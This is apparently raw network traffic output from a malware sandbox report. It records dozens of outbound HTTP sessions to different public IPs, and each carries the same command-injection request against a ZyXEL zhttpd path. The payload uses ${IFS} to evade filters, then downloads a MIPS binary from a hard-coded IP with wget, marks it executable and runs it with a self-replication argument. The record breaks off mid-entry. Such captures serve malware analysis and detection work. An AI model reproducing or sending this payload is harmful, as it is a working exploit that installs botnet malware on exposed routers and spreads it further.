                                                      Feb 2, 2024 06:35:53.636429071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4587192.168.2.1454016221.94.161.197443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.636476040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4588192.168.2.144901295.22.46.133443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.636523962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4589192.168.2.14502525.225.166.157443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.636548042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4590192.168.2.145944266.84.81.152443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.636590958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4591192.168.2.1459390156.214.118.38443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.636630058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4592192.168.2.1444948188.10.152.144443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.636672974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4593192.168.2.1460056142.237.97.26443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.636755943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4594192.168.2.144530039.156.247.175443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.636792898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4595192.168.2.1451732113.233.173.225443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.636797905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4596192.168.2.1449078134.221.10.27443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.636851072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4597192.168.2.145413660.64.64.103443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.636883020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4598192.168.2.1456858140.30.35.34443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.636930943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4599192.168.2.144050673.108.207.159443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.636956930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4600192.168.2.1434226162.152.145.130443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.636976957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4601192.168.2.1447736154.132.193.213443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.637012005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4602192.168.2.1440656169.228.75.192443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.637053967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4603192.168.2.1439004191.119.225.203443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.637109041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4604192.168.2.1448674116.202.200.217443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.637155056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4605192.168.2.1453082102.250.137.76443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.637192965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4606192.168.2.143962631.176.220.39443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.637227058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4607192.168.2.14374124.178.139.201443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.637294054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4608192.168.2.1460206186.21.178.94443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.637320042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4609192.168.2.1441746155.16.108.131443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.637382984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4610192.168.2.1450222181.94.151.199443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.637408018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4611192.168.2.1455952120.118.5.245443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.637455940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4612192.168.2.1435914178.60.46.47443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.637480974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4613192.168.2.143942224.202.43.66443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.637526989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4614192.168.2.1442362165.195.101.1443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.637574911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4615192.168.2.1440520140.74.156.124443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.637622118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4616192.168.2.145503219.237.182.186443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.637670994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4617192.168.2.1459738139.157.255.200443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.637700081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4618192.168.2.143402054.35.242.91443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.637746096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4619192.168.2.1443278117.159.141.113443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.637785912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4620192.168.2.1441382213.249.177.88443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.637845039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4621192.168.2.1437132147.57.58.176443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.637876987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4622192.168.2.1443896152.237.224.186443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.637916088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4623192.168.2.1458816139.218.205.44443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.637953043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4624192.168.2.1455736144.40.244.176443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.638000011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4625192.168.2.1433620163.206.76.107443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.638040066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4626192.168.2.1434156222.53.3.65443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.638091087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4627192.168.2.145715860.174.46.128443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.638122082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4628192.168.2.144034883.185.82.190443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.638155937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4629192.168.2.1448912123.25.26.8443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.638199091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4630192.168.2.1445856202.172.249.113443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.638226986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4631192.168.2.143348447.196.75.8443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.638266087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4632192.168.2.144072259.250.167.218443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.638312101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4633192.168.2.1443016205.36.107.74443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.638344049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4634192.168.2.145771257.47.144.237443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.638386011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4635192.168.2.144811482.178.180.93443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.638432026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4636192.168.2.1454556174.22.240.34443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.638452053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4637192.168.2.1444522126.225.15.193443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.638505936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4638192.168.2.144369242.199.246.133443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.638539076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4639192.168.2.1444972186.166.131.37443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.638569117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4640192.168.2.1452816223.146.97.39443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.638597965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4641192.168.2.1440016170.250.189.64443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.638633966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4642192.168.2.1435352194.146.34.130443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.638664961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4643192.168.2.1434418196.170.203.3443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.638724089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4644192.168.2.1436588184.225.156.204443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.638767958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4645192.168.2.1441180106.159.238.146443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.638806105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4646192.168.2.1454092115.77.108.21443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.638853073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4647192.168.2.144198451.4.97.173443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.638880968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4648192.168.2.1434022175.59.50.213443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:53.638931990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4649192.168.2.144985639.231.252.36443
                                                      TimestampBytes transferredDirectionData
